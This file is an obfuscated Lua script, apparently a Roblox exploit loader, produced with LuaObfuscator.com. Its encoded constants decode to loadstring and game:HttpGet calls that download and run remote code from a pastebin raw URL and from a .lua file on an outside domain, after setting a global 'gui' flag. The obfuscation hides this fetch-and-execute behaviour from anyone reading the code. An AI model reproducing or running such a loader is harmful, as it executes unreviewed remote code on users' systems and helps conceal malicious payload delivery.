--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v90=v2(v0(v30,16));if v19 then local v111=v5(v90,v19);v19=nil;return v111;else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + ((2569 -(1523 + 114)) -(857 + 74)))) ;return v91-(v91%(569 -(367 + 201))) ;else local v92=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v92 + v92))>=v92) and (1 + 0 + 0)) or (877 -(282 + 595)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * ((2483 -(892 + 65)) -(226 + 1044))) + v36 ;end if (v35==(0 -(0 -0))) then v36,v37=v1(v16,v18,v18 + (119 -(32 + (157 -72))) );v18=v18 + 2 + 0 ;v35=(1 -0) + 0 ;end end end local function v23() local v38=0 -(0 -0) ;local v39;local v40;local v41;local v42;while true do if (v38==((1538 -(1069 + 118)) -(87 + 263))) then return (v42 * (45169940 -28392724)) + (v41 * (65716 -(67 + 113))) + (v40 * (187 + 69)) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + (2 -1) ;v38=1 + 0 ;end end end local function v24() local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,1 -0 ,4 + 16 ) * ((3 -1)^32)) + v43 ;local v47=v20(v44,21 + 0 ,(1594 -(201 + 571)) -(368 + 423) );local v48=((v20(v44,100 -68 )==(19 -(10 + (1146 -(116 + 1022))))) and  -(3 -2)) or 1 ;if (v47==(442 -(416 + 26))) then if (v46==(0 -0)) then return v48 * 0 ;else v47=1 + 0 ;v45=0 -0 ;end elseif (v47==(3621 -1574)) then return ((v46==((258 + 180) -(145 + 293))) and (v48 * ((431 -(44 + 386))/(1486 -(998 + 488))))) or (v48 * NaN) ;end return v8(v48,v47-(325 + 698) ) * (v45 + (v46/((2 + 0)^52))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v67=860 -(814 + 45) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100,v101) local v102=(function() return 1763 -(454 + 1309) ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if ((0 + 0)~=v102) then else local v117=(function() return 0 -0 ;end)();while true do if ((1 -0)==v117) then v102=(function() return 2 -1 ;end)();break;end if (v117==0) then v93=(function() return 285 -(134 + 151) ;end)();v94=(function() return nil;end)();v117=(function() return 1;end)();end end end if (v102~=1) then else while true do if (0~=v93) then else v94=(function() return v95();end)();if (v96(v94, #"[", #"!")~=0) then else local v122=(function() return 0;end)();local v123=(function() return;end)();local v124=(function() return;end)();local v125=(function() return;end)();local v126=(function() return;end)();while true do if (v122==(1666 -(970 + 695))) then local v174=(function() return 0;end)();while true do if (v174~=(1 -0)) then else v122=(function() return 2;end)();break;end if (v174~=(1990 -(582 + 1408))) then else v125=(function() return nil;end)();v126=(function() return nil;end)();v174=(function() return 3 -2 ;end)();end end end if (v122~=(0 -0)) then else local v175=(function() return 0 -0 ;end)();while true do if (1==v175) then v122=(function() return 1825 -(1195 + 629) ;end)();break;end if (v175~=(0 -0)) then else v123=(function() return 0;end)();v124=(function() return nil;end)();v175=(function() return 1;end)();end end end if ((243 -(187 + 54))~=v122) then else while true do if (v123== #"[") then local v186=(function() return 780 -(162 + 618) ;end)();while true do if (v186==(1 + 0)) then v123=(function() return 2;end)();break;end if (v186==(0 + 0)) then v126=(function() return {v97(),v97(),nil,nil};end)();if (v124==0) then local v194=(function() return 0;end)();local v195=(function() return;end)();while true do if (0==v194) then v195=(function() return 0;end)();while true do if (v195~=0) then else v126[ #"xnx"]=(function() return v97();end)();v126[ #"asd1"]=(function() return v97();end)();break;end end break;end end elseif (v124== #"!") then v126[ #"xxx"]=(function() return v98();end)();elseif (v124==(2 -0)) then v126[ #"asd"]=(function() return v98() -((1 + 1)^(1652 -(1373 + 263))) ;end)();elseif (v124~= #"-19") then else local v202=(function() return 0;end)();local v203=(function() return;end)();while true do if (v202~=0) then else v203=(function() return 0;end)();while true do if (v203~=0) then else v126[ #"asd"]=(function() return v98() -((1002 -(451 + 549))^(6 + 10)) ;end)();v126[ #".com"]=(function() return v97();end)();break;end end break;end end end v186=(function() return 1 -0 ;end)();end end end if (v123~= #"asd") then else if (v96(v125, #"asd", #"xnx")== #"|") then v126[ #".dev"]=(function() return v99[v126[ #"asd1"]];end)();end v100[v101]=(function() return v126;end)();break;end if ((0 -0)~=v123) then else local v188=(function() return 1384 -(746 + 638) ;end)();while true do if ((0 + 0)==v188) then v124=(function() return v96(v94,2, #"xxx");end)();v125=(function() return v96(v94, #"asd1",6);end)();v188=(function() return 1;end)();end if (v188==1) then v123=(function() return  #"{";end)();break;end end end if (v123==2) then local v189=(function() return 0 -0 ;end)();local v190=(function() return;end)();while true do if (v189==0) then v190=(function() return 0;end)();while true do if ((341 -(218 + 123))~=v190) then else if (v96(v125, #"<", #">")~= #"}") then else v126[2]=(function() return v99[v126[1583 -(1535 + 46) ]];end)();end if (v96(v125,2,2 + 0 )~= #"}") then else v126[ #"19("]=(function() return v99[v126[ #"-19"]];end)();end v190=(function() return 1 + 0 ;end)();end if (v190~=1) then else v123=(function() return  #"xxx";end)();break;end end break;end end end end break;end end end break;end end return v93,v94,v95,v96,v97,v98,v99,v100,v101;end end end;end)();local v53=(function() return function(v103,v104,v105) local v106=(function() return 560 -(306 + 254) ;end)();local v107=(function() return;end)();while true do if (v106~=(0 + 0)) then else v107=(function() return 0;end)();while true do if (0==v107) then local v121=(function() return 0 -0 ;end)();while true do if (v121~=(1467 -(899 + 568))) then else v103[v104-#"\\" ]=(function() return v105();end)();return v103,v104,v105;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #">",v58 do local v70=(function() return 0 + 0 ;end)();local v71=(function() return;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if (v70==1) then v73=(function() return nil;end)();while true do if (v71==(0 -0)) then local v118=(function() return 0;end)();local v119=(function() return;end)();while true do if ((603 -(268 + 335))==v118) then v119=(function() return 0;end)();while true do if (v119~=1) then else v71=(function() return 291 -(60 + 230) ;end)();break;end if ((572 -(426 + 146))~=v119) then else local v176=(function() return 0 + 0 ;end)();while true do if (v176~=(1457 -(282 + 1174))) then else v119=(function() return 812 -(569 + 242) ;end)();break;end if (v176~=0) then else v72=(function() return v21();end)();v73=(function() return nil;end)();v176=(function() return 1;end)();end end end end break;end end end if (v71~=(2 -1)) then else if (v72== #"/") then v73=(function() return v21()~=(0 + 0) ;end)();elseif (v72==2) then v73=(function() return v24();end)();elseif (v72== #"19(") then v73=(function() return v25();end)();end v59[v69]=(function() return v73;end)();break;end end break;end if (v70==0) then local v112=(function() return 1024 -(706 + 318) ;end)();while true do if (v112==(1252 -(721 + 530))) then v70=(function() return 1272 -(945 + 326) ;end)();break;end if (0==v112) then v71=(function() return 0 -0 ;end)();v72=(function() return nil;end)();v112=(function() return 1 + 0 ;end)();end end end end end v57[ #"xxx"]=(function() return v21();end)();for v74= #"!",v23() do FlatIdent_7366E,Descriptor,v21,v20,v22,v23,v59,v54,v74=(function() return v52(FlatIdent_7366E,Descriptor,v21,v20,v22,v23,v59,v54,v74);end)();end for v75= #"|",v23() do v55,v75,v28=(function() return v53(v55,v75,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[702 -(271 + (1194 -765)) ];local v66=v61[3 + 0 ];return function(...) local v76=v64;local v77=v65;local v78=v66;local v79=v27;local v80=1;local v81= -(1501 -((3152 -1744) + 92));local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v108=1288 -(993 + (1048 -(239 + 514))) ,v84 do if (v108>=v78) then v82[v108-v78 ]=v83[v108 + 1 ];else v86[v108]=v83[v108 + 1 + 0 ];end end local v87=(v84-v78) + (1172 -(418 + 753)) ;local v88;local v89;while true do v88=v76[v80];v89=v88[1];if ((2253==2253) and (v89<=12)) then if (v89<=(2 + 3)) then if ((452==452) and (v89<=(1 + 1))) then if ((v89<=(0 + 0)) or (4557<2087)) then v80=v88[1 + 0 + 2 ];elseif (v89==((1859 -(797 + 532)) -(406 + 123))) then v86[v88[1771 -(1749 + 15 + 5) ]]=v88[1 + 2 ];else for v177=v88[(447 + 877) -(1249 + 73) ],v88[2 + 1 ] do v86[v177]=nil;end end elseif (v89<=(1148 -(466 + 679))) then if (v86[v88[4 -2 ]]==v88[11 -7 ]) then v80=v80 + (1901 -(106 + 1794)) ;else v80=v88[1 + 2 ];end elseif (v89>4) then v86[v88[1 + 1 ]]=v63[v88[8 -5 ]];elseif ((3874==3874) and (v86[v88[5 -3 ]]==v88[118 -(4 + 110) ])) then v80=v80 + (585 -(57 + 527)) ;else v80=v88[1430 -(41 + 1386) ];end elseif ((v89<=(111 -(17 + 86))) or (1938>4935)) then if (v89<=6) then local v128=v88[2 + (0 -0) ];v86[v128]=v86[v128](v13(v86,v128 + (1 -0) ,v81));elseif ((v89>(20 -13)) or (4255<3423)) then v86[v88[2]]=v63[v88[3]];else local v146=(1368 -(373 + 829)) -(122 + 44) ;local v147;while true do if (v146==(0 -0)) then v147=v88[6 -4 ];v86[v147]=v86[v147]();break;end end end elseif ((1454<=2491) and (v89<=(9 + 1))) then if ((v89>(2 + 7)) or (4157<=2803)) then local v148=v88[3 -1 ];v86[v148]=v86[v148](v13(v86,v148 + (66 -(30 + 35)) ,v81));else local v150=v88[2];local v151,v152=v79(v86[v150](v13(v86,v150 + 1 + 0 ,v88[(1991 -(476 + 255)) -(1043 + (1344 -(369 + 761))) ])));v81=(v152 + v150) -(3 -(2 + 0)) ;local v153=1212 -(323 + 889) ;for v179=v150,v81 do local v180=0 -0 ;while true do if (v180==0) then v153=v153 + (1 -0) ;v86[v179]=v151[v153];break;end end end end elseif (v89>(591 -(361 + 219))) then for v181=v88[322 -(53 + 267) ],v88[5 -2 ] do v86[v181]=nil;end else v86[v88[2]]=v88[1 + 2 ];end elseif (v89<=(431 -(15 + 398))) then if (v89<=(997 -(18 + (1202 -(64 + 174))))) then if ((4853>=2982) and (v89<=(48 -35))) then local v130=v88[2];local v131,v132=v79(v86[v130](v13(v86,v130 + 1 + 0 ,v88[2 + 1 ])));v81=(v132 + v130) -(851 -(20 + 830)) ;local v133=0;for v136=v130,v81 do v133=v133 + 1 + 0 + (0 -0) ;v86[v136]=v131[v133];end elseif (v89==14) then local v156=v88[338 -(144 + 192) ];v86[v156]=v86[v156]();else v86[v88[128 -(116 + 10) ]]=v88[1 + 2 ]~=(738 -(542 + 196)) ;end elseif (v89<=(34 -18)) then do return;end elseif (v89==(5 + 12)) then v86[v88[(218 -(42 + 174)) + 0 ]][v88[2 + 1 ]]=v88[10 -6 ];else do return;end end elseif (v89<=21) then if (v89<=(48 -(22 + 7))) then v86[v88[2]]=v88[1554 -(1126 + 425) ]~=(405 -(98 + 20 + 287)) ;elseif (v89==(78 -58)) then local v161=v88[1123 -(118 + 1003) ];local v162=v86[v88[8 -5 ]];v86[v161 + (378 -(61 + 81 + 235)) ]=v162;v86[v161]=v162[v88[18 -14 ]];else v86[v88[2]][v88[1 + 2 ]]=v88[(2485 -(363 + 1141)) -(553 + 424) ];end elseif ((4134>3357) and (v89<=(42 -19))) then if (v89>(20 + 2)) then v86[v88[2 + 0 ]]();else local v168=v88[2];local v169=v86[v88[3]];v86[v168 + 1 ]=v169;v86[v168]=v169[v88[(1583 -(1183 + 397)) + 1 ]];end elseif ((v89>((33 -22) + 10 + 3)) or (3417<2534)) then v80=v88[3];else v86[v88[2 + 0 ]]();end v80=v80 + ((2 + 0) -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F722O45416330485603073O0067657467656E762O033O00677569010003343O00682O7470733A2O2F65676F72696B7573612E73706163652F64326465316538662O3835393837643165313865333432342E6C756100293O00120B3O00014O0002000100013O0026043O00020001000100044O0002000100120B000100013O0026040001000F0001000200044O000F0001001208000200033O001208000300043O00201600030003000500120B000500064O0009000300054O000600023O00022O001700020001000100044O00280001002604000100050001000100044O0005000100120B000200013O002604000200200001000100044O00200001001208000300074O000E000300010002003015000300080009001208000300033O001208000400043O00201600040004000500120B0006000A4O0013000700014O0009000400074O000600033O00022O001700030001000100120B000200023O002604000200120001000200044O0012000100120B000100023O00044O0005000100044O0012000100044O0005000100044O0028000100044O000200012O00123O00017O00",v9(),...);